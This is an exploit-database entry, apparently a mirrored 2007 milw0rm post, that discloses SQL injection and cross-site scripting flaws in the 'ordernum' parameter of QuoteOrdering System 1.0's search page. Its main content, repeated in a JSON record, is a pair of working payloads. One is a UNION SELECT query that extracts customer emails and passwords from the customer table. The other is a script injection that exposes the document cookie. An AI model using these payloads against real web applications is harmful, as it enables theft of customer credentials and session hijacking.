Search...

QuoteOrdering System 1.0 - ordernum Multiple Vulnerabilities

2007-01-05T00:00:00

ID EXPLOITPACK:51B944B83C4D3193197F727C5BE73C96
Type exploitpack
Reporter ajann
Modified 2007-01-05T00:00:00

Description

QuoteOrdering System 1.0 - ordernum Multiple Vulnerabilities

                                        
                                            *******************************************************************************
# Title   :  QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# $$      :  $250.00

*******************************************************************************

[[SQL]]]---------------------------------------------------------

Register & Login Before Injection..


http://[target]/[path]//search.asp?ordernum=[SQL]

Example:

//search.asp?ordernum=1+union+select+cemail,0,0,cpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tblcustomer&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now

[[/SQL]]

[[XSS]]]---------------------------------------------------------

Register & Login Before Injection..


http://[target]/[path]//search.asp?ordernum=[XSS]

Example:

//search.asp?ordernum=%3Cscript%3EJavaScript%3Aalert%28document.cookie%29%3B%3C%2Fscript%3E&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now

[[/XSS]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-05]

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:44", "references": [], "description": "\nQuoteOrdering System 1.0 - ordernum Multiple Vulnerabilities", "edition": 1, "reporter": "ajann", "exploitpack": {"type": "webapps", "platform": "asp"}, "published": "2007-01-05T00:00:00", "title": "QuoteOrdering System 1.0 - ordernum Multiple Vulnerabilities", "type": "exploitpack", "enchantments": {"dependencies": {}, "score": {"value": 0.3, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.3}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2007-01-05T00:00:00", "id": "EXPLOITPACK:51B944B83C4D3193197F727C5BE73C96", "href": "", "viewCount": 2, "sourceData": "*******************************************************************************\n# Title : QUOTE&ORDERING SYSTEM 1.0 (ordernum) Multiple Vulnerabilities\n# Author : ajann\n# Contact : :(\n# S.Page : ...\n# $$ : $250.00\n\n*******************************************************************************\n\n[[SQL]]]---------------------------------------------------------\n\nRegister & Login Before Injection..\n\n\nhttp://[target]/[path]//search.asp?ordernum=[SQL]\n\nExample:\n\n//search.asp?ordernum=1+union+select+cemail,0,0,cpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+tblcustomer&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now\n\n[[/SQL]]\n\n[[XSS]]]---------------------------------------------------------\n\nRegister & Login Before Injection..\n\n\nhttp://[target]/[path]//search.asp?ordernum=[XSS]\n\nExample:\n\n//search.asp?ordernum=%3Cscript%3EJavaScript%3Aalert%28document.cookie%29%3B%3C%2Fscript%3E&designname=&date=&statusid=statusid%3C%3E0&btnser=Search+Now\n\n[[/XSS]]\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# ajann,Turkey\n# ...\n\n# Im not Hacker!\n\n# milw0rm.com [2007-01-05]", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645431014}}